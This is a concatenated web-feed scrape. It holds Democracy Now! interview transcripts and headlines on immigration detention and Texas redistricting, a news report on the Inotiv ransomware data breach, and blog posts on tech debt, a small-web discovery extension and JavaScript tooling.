And so, the additional aspect of what happens in Louisiana is that we have these very rural, isolated detention centers in central Louisiana, central and northern Louisiana, which are very far away from major metropolitan or from major population centers, which means what you end up with is people removed from their legal and support systems. So, when you had someone like Mahmoud Khalil being moved down here from New York, what you had was removing him from his social network, from people who could assist him, from being able to provide him with assistance. Same thing with Rümeysa Öztürk. And these were highly publicized cases, places where folks had large support networks. And so, when we deal with folks who don’t have those support networks, who don’t have that publicity, who don’t have that kind of support, and you have them in such a remote, isolated area, what you end up is basically warehousing folks without giving them an opportunity to fight their case and be able to present a viable case through actual due process.
AMY
GOODMAN
:
You can’t help but notice that New Orleans is a blue city in a red state, Louisiana. Louisiana has the most detention beds outside of Texas. Can you talk about the consent decree that was overturned last month, Homero?
HOMERO
LÓPEZ:
The consent decree was overturned last month by the Justice Department, and they wanted to get rid of it. It had been in place for over a decade here in Louisiana, that did not — or, here in New Orleans, that had not allowed the local sheriff’s office to cooperate with
ICE
.
Now the new sheriff, we don’t know exactly what she’s going to do, but what it does is it removes this tool that existed, which was originally implemented because of previous abuses, that had been determined by a federal court, that New Orleans police, New Orleans Sheriff’s Office should not be cooperating, and had ordered the sheriff’s office not to cooperate. Without that consent decree in place, it’s now up to the sheriff. And so, there is a movement on the ground from advocacy groups and from other organizers to push the sheriff to continue to have that kind of policy, but we’ll see what comes from that.
AMY
GOODMAN
:
And can you talk about the people you represent? I mean, I think it’s really important, not only in New Orleans, but around the country. A number of the people being picked up are going to their court hearings. They are following the rules, and they end up being arrested.
HOMERO
LÓPEZ:
Yeah, the majority of people who are being arrested, the majority of calls that we’re receiving are from folks who have — who are going through the process, whether they be children who originally applied through the Special Immigrant Juvenile status process and are awaiting their ability to apply for residency, whether it’s spouses of U.S. citizens who are going to their interviews and are being picked up, whether it’s people who have immigration court hearings and have filed their applications and are attending the hearings, are going — again, they’re doing it, quote-unquote, “the right way.” And that’s who is being picked up. Those are the folks who are the low-hanging fruit. Those are the folks who are going to be targeted.
There’s a reason that these officers are going to worksites and not necessarily doing in-depth investigations to identify folks that they claim are a danger to the community. Instead, what they’re doing is they’re taking folks out of our community: our neighbors, our friends, our family members. And that’s who they’re detaining and they’re sending into these terrible detention centers in order to try to quickly deport them from the country.
AMY
GOODMAN
:
Homero López, I want to thank you for being with us. Do you have a final comment on the City Council hearing that was held yesterday as mics were turned off on person after person who was calling for
ICE
-free zones?
HOMERO
LÓPEZ:
Yeah, we hope that City Council will take a stance. We understand that they don’t necessarily have a ton of power over federal actions, but the point here is about the values that the city stands for and what we are going to demonstrate to our community and to our residents of who we support, what we support and what we stand for in the city.
AMY
GOODMAN
:
Homero López is the legal director of
ISLA
, the Immigration Services and Legal Advocacy, based in New Orleans, Louisiana.
The original content of this program is licensed under a
Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License
. Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
The conservative majority on the U.S. Supreme Court has cleared the way for Texas to use a gerrymandered congressional map in next year’s midterm elections that a lower court found racially discriminatory. The 6-3 ruling is another political win for President Donald Trump and his allies, who h...
This is a rush transcript. Copy may not be in its final form.
AMY
GOODMAN
:
A major victory for President Trump: The Supreme Court has cleared the way for Texas to use a new congressional map designed to help Republicans pick up as many as five House seats in next year’s midterms. A lower court previously ruled the redistricting map was unconstitutional because it had been racially gerrymandered and would likely dilute the political power of Black and Latino voters.
Supreme Court Justice Elena Kagan wrote in her dissent, quote, “This court’s stay ensures that many Texas citizens, for no good reason, will be placed in electoral districts because of their race. And that result, as this court has pronounced year in and year out, is a violation of the constitution,” Justice Kagan wrote.
For more, we’re joined by Ari Berman, voting rights correspondent for
Mother Jones
magazine. His new
piece
is headlined “The Roberts Court Just Helped Trump Rig the Midterms.” Ari is the author of
Minority Rule: The Right-Wing Attack on the Will of the People — and the Fight to Resist It
.
Ari Berman, welcome back to
Democracy Now!
Talk about the significance of this Supreme Court decision yesterday. And what exactly was Samuel Alito’s role?
ARI
BERMAN
:
Good morning, Amy, and thank you for having me back on the show.
So, the immediate effect is that Texas will now be able to use a congressional map that has already been found to be racially gerrymandered and could allow Republicans to pick up five new seats in the midterms. And remember, Texas started this whole gerrymandering arms race, where state after state is now redrawing their maps ahead of the midterms, essentially normalizing something that is deeply abnormal.
It was an unsigned majority opinion, but Samuel Alito wrote a concurrence, basically saying that the Texas map was a partisan map, pure and simple. And remember, Amy, the Supreme Court has already laid the groundwork for Texas to do this kind of thing by essentially saying that partisan gerrymandering cannot be reviewed in federal court, no matter how egregious it is. They have blocked racial gerrymandering in the past, but now, essentially, what they’re allowing to do is they’re allowing Texas to camouflage a racial gerrymander as a partisan gerrymander, and they’ve given President Trump a huge victory in his war against American democracy.
AMY
GOODMAN
:
This overturned a lower court ruling. What are the role of the courts now, with the Supreme Court ruling again and again on this?
ARI
BERMAN
:
Well, basically, what the Supreme Court has done is it’s given President Trump the power of a king, and it’s given itself the power of a monarchy, because what happens is lower courts keep striking down things that President Trump and his party do, including Trump appointees to the lower courts — the Texas redistricting map was struck down by a Trump appointee, who found that it was racially gerrymandered to discriminate against Black and Latino voters. What the Roberts Court did was overturn that lower court opinion, just as it’s overturned so many other lower court opinions to rule in favor of Donald Trump and his party.
And one of the most staggering things, Amy, is the fact that the Roberts Court has ruled for President Trump 90% of the time in these shadow docket cases. So, in all of these big issues, whether it’s on voting rights or immigration or presidential powers, lower courts are constraining the president, and the Supreme Court repeatedly is saying that the president and his party are essentially above the law.
AMY
GOODMAN
:
So, you have talked about the Supreme Court in 2019 ruling in a case, ordered that courts should stay out of disputes over partisan gerrymandering. Tell us more about that.
ARI
BERMAN
:
It was really a catastrophic ruling for democracy, because what it said is that no matter how egregiously a state gerrymanders to try to target a political party, that those claims not only can’t be struck down in federal court, they can’t even be reviewed in federal court. And what that has done is it said to the Texases of the world, “You can gerrymander as much as you want, as long as you say that you’re doing it for partisan purposes.”
So, this whole exercise made a complete mockery of democracy, because Texas goes out there and says, “We freely admit that we are drawing these districts to pick up five new Republican seats.” President Trump says, “We’re entitled to five new seats.” Now, that would strike the average American as absurd, the idea that you could just redraw maps mid-decade to give more seats to your party. But the Supreme Court has basically laid the groundwork for that to be OK.
And even though racial gerrymandering, discriminating against Black and Hispanic voters, for example, is unconstitutional, which is what the lower court found in Texas, the Roberts Court continually has allowed Republicans to get away with this kind of racial gerrymandering by allowing them to just claim that it’s partisan gerrymandering. And that’s what happened once again in Texas yesterday.
ARI
BERMAN
:
Where does this leave the Voting Rights Act? And for people, especially young people who, you know, weren’t alive in 1965, explain what it says and its importance then.
ARI
BERMAN
:
The Voting Rights Act is the most important piece of civil rights legislation ever passed by the Congress. It quite literally ended the Jim Crow regime in the South by getting rid of the literacy tests and the poll taxes and all the other suppressive devices that had prevented Black people from being able to register and vote in the South for so many years.
It has been repeatedly gutted by the Roberts Court, which has ruled that states with a long history of discrimination, like Texas, no longer have to approve their voting changes with the federal government. The Roberts Court has made it much harder to strike down laws that discriminate against voters of color. And now they are preparing potentially to gut protections that protect people of color from being able to elect candidates of choice.
And I think the Texas ruling is a bad sign, another bad sign, for the Voting Rights Act, because a lower court found that Texas drew these maps to discriminate against Black and Latino voters, that they specifically targeted districts where Black and Latino voters had elected their candidates of choice. And the Supreme Court said, “No, we’re OK with doing it.” So it was yet another example in which the Supreme Court is choosing to protect white power over the power of Black, Latino, Asian American voters.
AMY
GOODMAN
:
So, where does this leave the other cases? You have California’s Prop 50 to redraw the state’s congressional districts, but that was done another way. It was done by a referendum. The people of California voted on it. And then you’ve got North Carolina. You’ve got Missouri. Where does this leave everything before next midterm elections?
ARI
BERMAN
:
Yeah, there’s a lot of activity in the courts so far. A federal court has already upheld North Carolina’s map, which was specifically targeted to dismantle a district of a Black Democrat there. The only district they changed was held by a Black Democrat in the state. In Missouri right now, organizers are trying to get signatures for a referendum to be able to block that district, which also targeted the district of a Black Democrat, Emanuel Cleaver.
California’s law is being challenged by Republicans and by the Justice Department. The Supreme Court did signal, however, in its decision in Texas that they believe that the California map was also a partisan gerrymander, so that that would lead one to believe that if the Supreme Court is going to uphold the Texas map, they would also uphold the California map.
And we’ve also seen repeatedly that there’s double standards for this court, that they allow Republicans to get away with things that they don’t allow Democrats to get away with. They’ve allowed Trump to get away with things that they did not allow Biden to get away with. But generally speaking, it seems like the Supreme Court is going to allow states to gerrymander as much as they want. And that’s going to lead to a situation where American democracy is going to become more rigged and less fair.
AMY
GOODMAN
:
Ari Berman, voting rights correspondent for
Mother Jones
magazine, author of
Minority Rule: The Right-Wing Attack on the Will of the People — and the Fight to Resist It
. We’ll link to your
piece
, “The Roberts Court Just Helped Trump Rig the Midterms.”
Next up, immigration crackdowns continue nationwide. We’ll go to New Orleans, where agents are expected to make 5,000 arrests, and to Minneapolis, as Trump escalates his attacks on the Somali community there, calling the whole community “garbage.” Stay with us.
[break]
AMY
GOODMAN
:
“Ounadikom,” “I Call Out to You,” composed by Ahmad Kaabour at the outbreak of the Lebanese Civil War in 1975 and performed at a Gaza benefit concert on Wednesday by the
NYC
Palestinian Youth Choir.
The original content of this program is licensed under a
Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License
. Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
Show HN: Pbnj – A minimal, self-hosted pastebin you can deploy in 60 seconds
Most Technical Problems Are Really People Problems
I once worked at a company which had an enormous amount of technical debt - millions of lines of code, no unit tests, based on frameworks that were well over a decade out of date. On one specific project, we had a market need to get some Windows-only modules running on Linux, and rather than cross-compiling, another team had simply copied & pasted a few hundred thousand lines of code, swapping Windows-specific components for Linux-specific.
For the non-technical reader, this is an enormous problem because now two versions of the code exist. So, all features & bug fixes must be solved in two separate codebases that will grow apart over time. When I heard about this, a young & naive version of me set out to fix the situation....
Tech debt projects are always a hard sell to management, because even if everything goes flawlessly, the code just does roughly what it did before.
This project was no exception, and the optics weren't great. I did as many engineers do and "ignored the politics", put my head down, and got it done. But, the project went long, and I lost a lot of clout in the process.
I realized I was essentially trying to solve a
people
problem with a
technical
solution. Most of the developers at this company were happy doing the same thing today that they did yesterday...and five years ago. As
Andrew Harmel-Law
points out, code tends to follow the personalities of the people that wrote it. The code was calcified because the developers were also. Personality types who dislike change tend not to design their code with future change in mind.
Most technical problems are really people problems.
Think about it. Why does technical debt exist? Because requirements weren't properly clarified before work began. Because a salesperson promised an unrealistic deadline to a customer. Because a developer chose an outdated technology because it was comfortable. Because management was too reactive and cancelled a project mid-flight. Because someone's ego wouldn't let them see a better way of doing things.
The core issue with the project was that admitting the need for refactoring was also to admit that the way the company was building software was broken and that individual skillsets were sorely out of date. My small team was trying to fix one module of many, while other developers were writing code as they had been for decades. I had one developer openly tell me, "I don't want to learn anything new." I realized that
you'll never clean up tech debt faster than others create it.
It is like triage in an emergency room,
you must stop the bleeding first
, then you can fix whatever is broken.
An Ideal World
The project also disabused me of the engineer's ideal of a world in which engineering problems can be solved in a vacuum - staying out of "politics" and letting the work speak for itself - a world where deadlines don't exist...and let's be honest, neither do customers. This ideal world rarely exists. The vast majority of projects have non-technical stakeholders, and telling them "just trust me; we're working on it" doesn't cut it. I realized that
the
perception
that your team is getting a lot done is just as important as getting a lot done.
Non-technical people do not intuitively understand the level of effort required or the need for tech debt cleanup; it must be communicated effectively by engineering - in both initial estimates & project updates. Unless leadership has an engineering background, the value of the technical debt work likely needs to be
quantified
and shown as
business
value.
Heads Up
Perhaps these are the lessons that prep one for more senior positions. In my opinion, anyone above senior engineer level needs to know how to collaborate cross-functionally, regardless of whether they choose a technical or management track. Schools teach Computer Science, not navigating personalities, egos, and personal blindspots.
I have worked with some incredible engineers, better than myself - the type that have deep technical knowledge on just about any technology you bring up. When I was younger, I wanted to be that engineer - the "engineer's engineer". But I realize now, that is not my personality. I'm too ADD for that. :)
For all of their (considerable) strengths, more often than not, those engineers shy away from the interpersonal. The
tragedy is that they are incredibly productive ICs, but may fail
with bigger initiatives because they are only one person - a single
processor core can only go so fast. Perhaps equally valuable is the "heads
up
coder" - the person who is deeply technical, but also able to pick their head up & see project risks coming (technical & otherwise) and steer the team around them.
Pharma firm Inotiv discloses data breach after ransomware attack
Bleeping Computer
www.bleepingcomputer.com
2025-12-05 13:05:52
American pharmaceutical firm Inotiv is notifying thousands of people that they're personal information was stolen in an August 2025 ransomware attack. [...]...
American pharmaceutical firm Inotiv is notifying thousands of people that they're personal information was stolen in an August 2025 ransomware attack.
Inotiv is an Indiana-based contract research organization specializing in drug development, discovery, and safety assessment, as well as live-animal research modeling. The company has about 2,000 employees and an annual revenue exceeding $500 million.
When it disclosed the incident, Inotiv said that the attack had disrupted business operations after some of its networks and systems (including databases and internal applications) were taken down.
Earlier this week, the company revealed in a filing with the U.S. Securities and Exchange Commission (SEC) that it has "restored availability and access" to impacted networks and systems and that it's now
sending data breach notifications
to 9,542 individuals whose data was stolen in the August ransomware attack.
"Our investigation determined that between approximately August 5-8, 2025, a threat actor gained unauthorized access to Inotiv's systems and may have acquired certain data," it says in letter samples
filed with Maine's attorney general
.
"Inotiv maintains certain data related to current and former employees of Inotiv and their family members, as well as certain data related to other individuals who have interacted with Inotiv or companies it has acquired."
Inotiv has not yet shared which types of data were stolen during the incident, nor has it attributed the attack to a specific cybercrime operation.
However, the Qilin ransomware group claimed responsibility for the breach in August, leaked data samples allegedly stolen from the company's compromised systems, and said they exfiltrated over 162,000 files totaling 176 GB.
Inotiv entry on Qilin's leak site (BleepingComputer)
An Inotiv spokesperson has not yet responded to BleepingComputer's request for comment regarding the validity of Qilin ransomware's claims.
Qilin surfaced in August 2022 as a Ransomware-as-a-Service (RaaS) operation under the "Agenda" name and has since claimed responsibility for over 300 victims on its dark web leak site.
Broken IAM isn't just an IT problem - the impact ripples across your whole business.
This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.
I don't like RSS readers. I know, this is blasphemous especially on a website where I'm actively encouraging you to subscribe through RSS. As someone writing stuff, RSS is great for me. I don't have to think about it, the requests are pretty light weight, I don't need to think about your personal data or what client you are using. So as a
protocol
RSS is great, no notes.
However as something I'm going to consume, it's frankly
a giant chore
. I feel pressured by RSS readers, where there is this endlessly growing backlog of things I haven't read. I rarely want to read all of a websites content from beginning to end, instead I like to jump between them. I also don't really care if the content is chronological, like an old post about something interesting isn't less compelling to me than a newer post.
What I want, as a user experience, is something akin to TikTok. The whole appeal of TikTok, for those who haven't wasted hours of their lives on it, is that I get served content based on an algorithm that determines what I might think is useful or fun. However what I would like is to go through content from random small websites. I want to sit somewhere and passively consume random small creators content, then upvote some of that content and the service should show that more often to other users. That's it. No advertising, no collecting tons of user data about me, just a very simple "I have 15 minutes to kill before the next meeting, show me some random stuff."
In this case the "algorithm" is pretty simple: if more people like a thing, more people see it. But with Google on its way to replacing search results with LLM generated content, I just wanted to have something that let me play around with the small web the way that I used to.
There actually used to be a service like this called StumbleUpon which was more focused on pushing users towards popular sites. It has been taken down, presumably because there was no money in a browser plugin that sent users to other websites whose advertising you didn't control.
So I wanted to do something pretty basic. You hit a button, get served a new website. If you like the website, upvote it, otherwise downvote it. If you think it has objectionable content then hit report. You have to make an account (because I couldn't think of another way to do it) and then if you submit links and other people like it, you climb a Leaderboard.
On the backend I want to (very slowly so I don't cost anyone a bunch of money) crawl a bunch of RSS feeds, stick the pages in a database and then serve them up to users. Then I want to track what sites get upvotes and return those more often to other users so that "high quality" content shows up more often. "High quality" would be defined by the community or just me if I'm the only user.
It's pretty basic stuff, most of it copied from tutorials scattered around the Internet. However I
really
want to drive home to users that this is not a Serious Thing. I'm not a company, this isn't a new social media network, there are no plans to "grow" this concept beyond the original idea unless people smarter than me ping with me ideas. So I found this amazing CSS library:
https://sakofchit.github.io/system.css/
The Apple's System OS design from the late-80s to the early 90s was one of my personal favorites and I think would send a strong signal to a user that this is not a professional, modern service.
Great, the basic layout works. Let's move on!
Backend
So I ended up doing FastAPI because it's very easy to write. I didn't want to spend a ton of time writing the API because I doubt I nailed the API design on the first round. I use sqlalchemy for the database. The basic API layout is as follows:
admin - mostly just generating read-only reports of like "how many websites are there"
leaderboard - So this is my first attempt at trying to get users involved. Submit a website that other people like? Get points, climb leaderboard.
The source for the RSS feeds came from the (very cool) Kagi small web Github.
https://github.com/kagisearch/smallweb
. Basically I assume that websites that have submitted their RSS feeds here are cool with me (very rarely) checking for new posts and adding them to my database. If you want the same thing as this does, but as an iFrame, that's the Kagi small web service.
The scraping work is straightforward. We make a background worker, they grab 5 feeds every 600 seconds, they check for new content on each feed and then wait until the 600 seconds has elapsed to grab 5 more from the smallweb list of RSS feeds. Since we have a lot of feeds, this ends up look like we're checking for new content less than once a day which is the interval that I want.
Then we write it out to a sqlite database and basically track "has this URL been reported", if so, put it into a review queue and then how many times this URL has been liked or disliked. I considered a "real" database but honestly sqlite is getting more and more scalable every day and its impossible to beat the immediate start up and functionality. Plus very easy to back up to encrypted object storage which is super nice for a hobby project where you might wipe the prod database at any moment.
In terms of user onboarding I ended up doing the "make an account with an email, I send a link to verify the email". I actually hate this flow and I don't really want to know a users email. I never need to contact you and there's not a lot associated with your account, which makes this especially silly. I have a ton of email addresses and no real "purpose" in having them. I'd switch to Login with Apple, which is great from a security perspective but not everybody has an Apple ID.
I also did a passkey version, which worked fine but the OSS passkey handling was pretty rough still and most people seem to be using a commercial service that handled the "do you have the passkey? Great, if not, fall back to email" flow. I don't really want to do a big commercial login service for a hobby application.
Auth is a JWT, which actually was a pain and I regret doing it. I don't know why I keep reaching for JWTs, they're a bad user experience and I should stop.
Can I just have the source code?
I'm more than happy to release the source code once I feel like the product is in a somewhat stable shape. I'm still ripping down and rewriting relatively large chunks of it as I find weird behavior I don't like or just decide to do things a different way.
In the end it does seem to do whats on the label. We have over 600,000 individual pages indexed.
So how is it to use?
Honestly I've been pretty pleased. But there are some problems.
First I couldn't find a reliable way of switching the keyboard shortcuts to be Mac/Windows specific. I found some options for querying platform but they didn't seem to work, so I ended up just hardcoding them as Alt which is not great.
The other issue is that when you are making an extension, you spend a long time working with these manifests.json. The specific part I really wasn't sure about was:
I'm not entirely sure if that's all I'm doing? I think so from reading the docs.
Anyway I built this mostly for me. I have no idea if anybody else will enjoy it. But if you are bored I encourage you to give it a try. It should be pretty light weight and straight-forward if you crack open the extension and look at it. I'm not loading any analytics into the extension so basically until people complain about it, I don't really know if its going well or not.
Future stuff
I need to sort stuff into categories so that you get more stuff in genres you like. I don't 100% know how to do that, maybe there is a way to scan a website to determine the "types" of content that is on there with machine learning? I'm still looking into it.
There's a lot of junk in there. I think if we reach a certain number of downvotes I might put it into a special "queue".
I want to ensure new users see the "best stuff" early on but there isn't enough data to determine "best vs worst".
I wish there were more independent photography and science websites. Also more crafts. That's not really a "future thing", just me putting a hope out into the universe. Non-technical beta testers get overwhelmed by technical content.
Headlines for December 5, 2025
Democracy Now!
www.democracynow.org
2025-12-05 13:00:00
“One of the Most Troubling Things I’ve Seen”: Lawmakers React to U.S. “Double-Tap” Boat Strike, Pentagon Watchdog Finds Hegseth’s Use of Signal App “Created a Risk to Operational Security”, CNN Finds Israel Killed Palestinian Aid Seekers and Bulldozed ...
In this age of widespread misinformation and increased threats to press freedom, support for independent journalism is more important than ever.
Media is
essential
to the functioning of a democratic society.
Please donate today, so we can keep delivering urgent reporting on the world’s most pressing issues.
Every dollar makes a difference
. Thank you so much!
Democracy Now!
Amy Goodman
Non-commercial news needs your support.
We rely on contributions from you, our viewers and listeners to do our work. If you visit us daily or weekly or even just once a month, now is a great time to make your monthly contribution.
“One of the Most Troubling Things I’ve Seen”: Lawmakers React to U.S. “Double-Tap” Boat Strike
Dec 05, 2025
The Pentagon has announced the U.S. blew up another boat in the eastern Pacific, killing four people. The Pentagon claimed the boat was carrying drugs but once again offered no proof. The U.S. has now killed at least 87 people in 22 strikes on boats since September. This comes as controversy continues to grow over a September 2 strike, when the U.S. targeted and killed two men who had survived an initial attack. Nine people were killed in the first strike. On Thursday, members of Congress were shown video of two men being killed at a time when they were clinging to the side of their overturned boat. Democratic Representative Jim Himes of Connecticut spoke after watching the video.
Rep. Jim Himes
: “What I saw in that room was one of the most troubling things I’ve seen in my time in public service. You have two individuals in clear distress without any means of locomotion, with a destroyed vessel, who are killed by the United States.”
Lawmakers also questioned Admiral Frank “Mitch” Bradley, the operation’s commanding officer. Many questions remain over Defense Secretary Pete Hegseth’s role. The Washington Post recently reported Hegseth had ordered Pentagon officials to “kill everybody” on the boat.
Pentagon Watchdog Finds Hegseth’s Use of Signal App “Created a Risk to Operational Security”
Dec 05, 2025
The Pentagon’s inspector general has released its report examining Hegseth’s sharing of sensitive information about U.S. strikes in Yemen on a Signal group chat earlier this year. The report found Hegseth’s actions “created a risk to operational security that could have resulted in failed U.S. mission objectives and potential harm to U.S. pilots.” The report also criticized Hegseth’s use of a personal cellphone to conduct official business. Hegseth himself refused to cooperate with the investigation, refusing to hand over his phone or sit for an interview.
CNN
Finds Israel Killed Palestinian Aid Seekers and Bulldozed Bodies into Shallow, Unmarked Graves
Dec 05, 2025
Israel’s military is continuing to pound the Gaza Strip in violation of the October 10 ceasefire agreement. Al Jazeera reports Israeli ships opened fire toward the coast of Khan Younis, while air raids struck the city of Rafah. There are reports of explosions and Israeli artillery fire around Gaza City, including airstrikes near the Maghazi refugee camp.
Meanwhile, a
CNN
investigation has found the Israeli military fired indiscriminately at starving Palestinians collecting sacks of flour near an aid distribution site near the Zikim crossing in June, then bulldozed their bodies into shallow, unmarked graves, with some bodies left to decompose or be partially eaten by dogs. Gaza officials and the United Nations estimate about 10,000 Palestinians remain missing from Israel’s more than two-year assault, while the official death toll recently passed 70,000.
Ireland, Slovenia, Spain and the Netherlands to Boycott Eurovision over Israel’s Participation
Dec 05, 2025
Image Credit: 'The Rising Star' Keshet 12
Public broadcasters in Ireland, Slovenia, the Netherlands and Spain said Thursday they will boycott the 2026 Eurovision Song Contest, after the European Broadcasting Union refused to hold a vote on whether to exclude Israel. This is José Pablo López, president of Spain’s national broadcaster.
José Pablo López
: “We maintain the same position we had months ago when we said Israel’s participation in the Eurovision festival was untenable for two main reasons, firstly because the genocide it has perpetuated in Gaza. As president of the corporation, I keep thinking that Eurovision is a contest, but human rights are not a contest.”
Eurovision is among the most popular TV and online events in the world; last year, viewers from 156 countries cast votes for their favorite contestants.
Protesters Picket New Jersey Warehouse, Seeking to Block Arms Shipments to Israel
Dec 05, 2025
In New Jersey, protesters picketed this morning outside a Jersey City warehouse that is used to transport military cargo to Israel. A recent report by the Palestinian Youth Movement and Progressive International found the warehouse handles over 1,000 tons of Israel-bound military cargo every week, including thousands of MK-84 2,000-pound bombs that have been used to level Gaza.
Supreme Court Allows Texas to Use Racially Gerrymandered Congressional Map Favoring Republicans
Dec 05, 2025
The U.S. Supreme Court has cleared the way for Texas to use a new congressional map designed to help Republicans pick up as many as five seats next year. A lower court had previously ruled the redistricting plan was unconstitutional because it would likely dilute the political power of Black and Latino voters. Liberal Supreme Court Justice Elena Kagan wrote in her dissent, “This court’s stay ensures that many Texas citizens, for no good reason, will be placed in electoral districts because of their race. And that result, as this court has pronounced year in and year out, is a violation of the constitution.”
FBI
Arrests Suspect for Allegedly Planting Pipe Bombs on Capitol Hill Ahead of Jan. 6 Insurrection
Dec 05, 2025
The
FBI
has arrested a 30-year-old man from Virginia for allegedly planting pipe bombs near the Republican and Democratic National Committee headquarters in January 2021 — on the night before the January 6 insurrection at the U.S. Capitol. The suspect, Brian Cole, is expected to appear in court today.
DOJ
Asks Judge to Rejail Jan. 6 Rioter Pardoned by Trump, After Threats to Rep. Jamie Raskin
Dec 05, 2025
The Justice Department has asked a judge to rejail a participant in the January 6 insurrection who had been pardoned by President Trump. The Justice Department made the request after the man, Taylor Taranto, showed up near the home of Democratic Congressmember Jamie Raskin, who served on the January 6 House Select Committee. Security has been increased for Raskin. In October, Taranto was sentenced to time served for making a threat near the home of former President Obama.
Grand Jury Refuses to Reindict Letitia James After Judge Throws Out First Indictment
Dec 05, 2025
A federal grand jury in Virginia has declined a second attempt by the Justice Department to indict New York Attorney General Letitia James on charges that she lied in her mortgage application. In a statement, Letitia James wrote, “As I have said from the start, the charges against me are baseless. It is time for this unchecked weaponization of our justice system to stop.” It’s the latest defeat to President Trump’s campaign of retribution against his political enemies. The Trump administration is reportedly considering a third attempt to obtain an indictment against James.
Protesters Ejected from New Orleans City Council Meeting After Demanding ”
ICE
-Free Zones”
Dec 05, 2025
Image Credit: New Orleans City Council
In New Orleans, about 30 activists were ejected from a City Council meeting Thursday after calling for ”
ICE
-free zones” and asking local leaders to do more to protect immigrants. During a public comment period, members of the public went to the microphone one by one and were cut off when it became clear they wanted to speak on immigration, which wasn’t on the formal agenda.
Brittany Cary:
“And I’m asking City Council for
ICE
-free zones. Make all city-owned property
ICE
-free zones, and prohibit
ICE
and
DHS
from using city property to stage their operations. No collaboration with
ICE
. City Council must pass ordinances that codify noncollaboration” —
Chair
: “Ma’am?”
Brittany Cary:
— “between the city of New Orleans and
ICE
, including all of its offices and” —
Chair
: “As I stated previously, that is not germane. Thank you for your comments.”
The protests came as the Border Patrol announced a surge of more than 200 federal immigration agents into New Orleans, which the agency is calling “Operation Catahoula Crunch.” They aim to make 5,000 arrests over two months. We’ll go to New Orleans later in the broadcast.
Honduran Presidential Candidate Nasralla Blames Trump’s Interference as Opponent Takes Lead
Dec 05, 2025
Honduran presidential candidate Salvador Nasralla has alleged fraud after his conservative rival Nasry Asfura regained the lead, as election officials continue to tally up votes from Sunday’s election. Nasralla also accused President Trump of interfering in the race by publicly backing Asfura. Some election officials have also publicly criticized the election process. On Thursday, Marlon Ochoa, who serves on Honduras’s National Electoral Council, decried what she called an electoral “coup.” She said, “I believe there is unanimity among the Honduran people that we are perhaps in the least transparent election in our democratic history.”
Trump Hosts Leaders of
DRC
and Rwanda in D.C. as U.S. Signs Bilateral Deals on Minerals
Dec 05, 2025
President Trump welcomed the leaders of the Democratic Republic of Congo and Rwanda to Washington, D.C., Thursday for the signing of an agreement aimed at ending decades of conflict in the eastern
DRC
. Trump also announced the U.S. had agreed to bilateral deals that will open the African nations’ reserves of rare earth elements and other minerals to U.S. companies. The signing ceremony was held in the newly renamed Donald J. Trump Institute of Peace.
Trump Struggles to Stay Awake in Another Public Event, Adding to Speculation over His Health
Dec 05, 2025
During Thursday’s event, Trump struggled to keep his eyes open. This follows other recent public appearances where Trump appeared to fall asleep at times. And once again, Trump was spotted wearing bandages on his right hand, which appeared bruised and swollen. That fueled further speculation about the president’s health. On Monday, the White House said the results from Trump’s recent
MRI
exam were “perfectly normal,” after Trump was unable to tell reporters aboard Air Force One what part of his body was scanned.
Reporter
: “What part of your body was the
MRI
looking at?”
President Donald Trump
: “I have no idea. It was just an
MRI
. What part of the body? It wasn’t the brain, because I took a cognitive test, and I aced it. I got a perfect mark, which you would be incapable of doing. Goodbye, everybody. You. too.”
Netflix Announces $72 Billion Deal to Buy Warner Bros. Discovery
Dec 05, 2025
In business news, Netflix has announced it will buy Warner Bros. in a deal worth at least $72 billion. The deal could reshape the entertainment and media industry, as it will give Netflix control of Warner’s movie and TV studios, as well as the
HBO
Max streaming service.
12 Arrested as Striking Starbucks Workers Hold Sit-In Protest at Empire State Building
Dec 05, 2025
Image Credit: X/@FightForAUnion
In labor news, a dozen striking Starbucks workers were arrested in New York City Thursday as they blocked the doors to the Empire State Building, where Starbucks has a corporate office. Starbucks workers at over 100 stores are on strike.
Judge Sentences California Animal Rights Activist to 90 Days in Jail for Freeing Abused Chickens
Dec 05, 2025
A University of California student has been ordered to serve 90 days in jail for breaking into a Sonoma County poultry slaughterhouse and freeing four chickens. Twenty-three-year-old Zoe Rosenberg of Berkeley received the sentence on Wednesday, after a jury convicted her in October of felony conspiracy and three misdemeanor counts. She was ordered to pay more than $100,000 to Petaluma Poultry, which is owned by the agribusiness giant Perdue Farms. Rosenberg’s supporters with the group Direct Action Everywhere say the chickens she rescued were worth $24; they’re reportedly alive and well at a sanctuary for rescued farm animals. Rosenberg told supporters her action was prompted by investigations that found routine violations of California’s animal cruelty laws at Petaluma Poultry slaughterhouses.
Zoe Rosenberg
: “We found that there were dead birds among the living, that the air quality was so poor that chickens were struggling to breathe. I myself was struggling to breathe even with a KN95 mask as I investigated this facility. … And we have been calling on the California attorney general to take action, because the Sonoma County District Attorney’s Office has made it abundantly clear that they do not care about these animals whatsoever, that they care far more about the profits of Perdue, a company that makes over $10 billion a year on the backs of these animals.”
National Parks Service Prioritizes Free Entry on Trump’s Birthday Over Juneteenth and
MLK
Holidays
Dec 05, 2025
The Trump administration has ended a policy granting visitors free access to national parks on the Juneteenth and Martin Luther King Jr. Day holidays. Instead, the 116 parks that charge entrance fees will now waive admission charges on June 14 — President Trump’s birthday.
The original content of this program is licensed under a
Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License
. Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
Non-commercial news needs your support
We rely on contributions from our viewers and listeners to do our work.
Please do your part today.
Over the last couple of years, we've witnessed a remarkable shift in the
JavaScript ecosystem, as many popular developer tools have been rewritten in
systems programming languages like Rust, Go, and Zig.
This transition has delivered dramatic performance improvements and other
innovations that are reshaping how developers build JavaScript-backed
applications.
In this article, we'll explore the driving forces behind this revolution, its
implications for the wider ecosystem, and some of the most impactful projects
leading the charge.
The shift toward building JavaScript tooling in systems languages is a response
to real, mounting pressure in the ecosystem. While JavaScript engines have
become remarkably fast over the years, the language itself wasn't designed for
CPU-heavy workloads.
Modern JavaScript applications aren't just a few scripts anymore — they're
sprawling codebases with thousands of dependencies, complex module graphs, and
